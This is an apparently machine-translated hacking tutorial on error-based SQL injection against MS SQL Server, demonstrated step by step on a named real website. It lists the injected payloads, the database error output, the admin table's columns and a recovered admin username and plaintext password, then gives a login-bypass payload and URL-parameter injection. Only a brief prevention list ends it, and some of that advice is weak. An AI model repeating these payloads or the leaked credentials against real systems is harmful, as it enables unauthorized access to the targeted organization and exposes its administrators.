MS SQL Injection, step by step
Lately, you often hear the term "SQL Injection"?
You know how dangerous this bug?
we will present step by step is SQL Injection.
Note: we will restrict the discussion on SQL Injection in MS-SQL Server.
We'll take the example of site-www.pln wilkaltim.co.id
There are two drawbacks to this site, namely:
1. Tabel News
2. Tabel Admin
The first step, we determine that the holes can be injected with a walk (Enumeration) they will be used on site.
We will find a way 2 model input parameters, namely by entering input through the box and put it through the URL address.
We take the easiest first, by way of the input box. Then we search box for admin login. Www.pln-wilkaltim.co.id/sipm/admin/admin.asp found the first step to determining the table name and fieldnya, we inject NIP box with the command (password is up to you):
' having 1=1--
do not forget to write the single quotes and double hyphens (important). The second meaning can be a sign they will see www.neoteker.or.id SQL Injection tutorial. Then will come out error message:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NOMOR' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Come out of our first field name
Note the name table : T_ADMIN
Note the name field : NOMOR
Then we will find the next field name, along with a table name may be different.
We injected NIP box (the password is up to you):
' group by T_ADMIN.NOMOR having 1=1--
going out error messages:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NIP' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
means that the table names and second our field
record : T_ADMIN.NIP
then we find the third our field
' group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1--
going out error messages:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.PASSWORD' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
record the third table : T_ADMIN.PASSWORD
do the steps above until we find the last field
Here is the error message occurs, if we check the last field by injecting:
' group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL
having 1=1--
(notes the sentence should not be cut line)
--------------------
- nip or password or you have the wrong units !! -
--------------------
We successfully managed to find the last field.
list column (field):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL
There is only one table for this authentication (ie T_ADMIN),
this will make it easier for our process.
The next step, we determine the structure of the areas mentioned above.
we inject in the box (pass up to you):
' union select sum(NOMOR) from T_ADMIN--
The meaning of the query is: we try to apply the sum clause before determining whether the number of columns in two similar rowsets.
Our language is easy to insert a clause sum (amount) applies to numeric column types, so for typing non-numeric columns, will be out errors that can tell us on the relevant column.
Error message
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries
in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
--------------------
means that the next column type is numeric
next we inject:
' union select sum(NIP) from T_ADMIN--
going out error messages
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum
or average aggregate operation cannot take a char data
type as an argument.
/sipm/admin/dologin.asp, line 7
--------------------
means that NIP column type is char
We must repeat the above command to the next column by replacing nama_kolom in:
' union select sum(nama_kolom) from T_ADMIN--
with the next column we get the column type
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char
The next step, we will search the contents of the password field, for the user admin, by injecting:
' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'--
means we choose the minimum user name greater than 'a' and try to turn it into type integer. Meaning the number 1 as 6 times it is that we only choose the NAME column, and ignore the other columns 6.
Going out error messages:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the varchar value 'bill ' to
a column of data type int.
/sipm/admin/dologin.asp, line 7
--------------------
you see:
varchar value 'bill '
'bill' is the name of the user in the last record entered, or the NAMA column in the last record inserted..
next, we inject"
' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where NAMA = 'bill'--
notes: to row
Going out error messages:
---------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the nvarchar value 'm@mpusk@u' to a
column of data type int.
/sipm/admin/dologin.asp, line 7
---------------------
means we are successful
we get
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u
please login to:
www.pln-wilkaltim.co.id/sipm/admin/admin.asp
with the above account, is a branch, please fill yourself with trial and error
or we just use the shortcut
we inject:
' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN
where NAMA ='bill'--
notes: to row
Directly to the admin menu.
Remember: do not make mischief! send admin!
he second hole in the news. There are basically news content from another table.
So can we inject tetep! The difference is, we must enter the parameters in its URL address.
Example:
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
there are parameters id and idSM
when we try to inject it influential is the parameter id
we inject:
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119' having 1=1--
Going out error messages:
---------------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'tb_news.NewsId' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/dari_Media.asp, line 58
---------------------------
means that 'tb_news.NewsId' is first our table n colomn
We repeat the steps above to get
tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bit data
tb_news.review =>
tb_news.sumber => char
tb_news.dateagenda => datetime
Well, next is your own work to develop your knowledge.
You can enter the word that you can determine their own content.
This is why the holes in MS-SQL Server is very dangerous.
=========================================
Specially for ADMIN & WEB PROGRAMMER !!!
========================================
Common prevention strategies used
1. Limit the length of the input box (if possible), by limiting the source code, so a cracker beginners will be confused for a moment to see her input box can not be injected with a long command.
2. Filter input is entered by the user, especially the use of single quotes (Input Validation).
3. Turn off or hide error messages from SQL Server is running.
4. turn off the standard facilities such as Stored Procedures, Extended Stored Procedures if possible.
5. Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.
Well it might be what I can tell .....
This is a picture, how the Internet is not secure ...
If you want more secure, off your network cable, disk drives off, from your hard drive, you kompie sale!
Just kidding )
Referensi :
[+] sqlinjection, www.BlackAngels.it
[+] anvanced sql injection in sql server applications
(www.ngssoftware.com)
[+] sql injection walktrough (www.securiteam.com)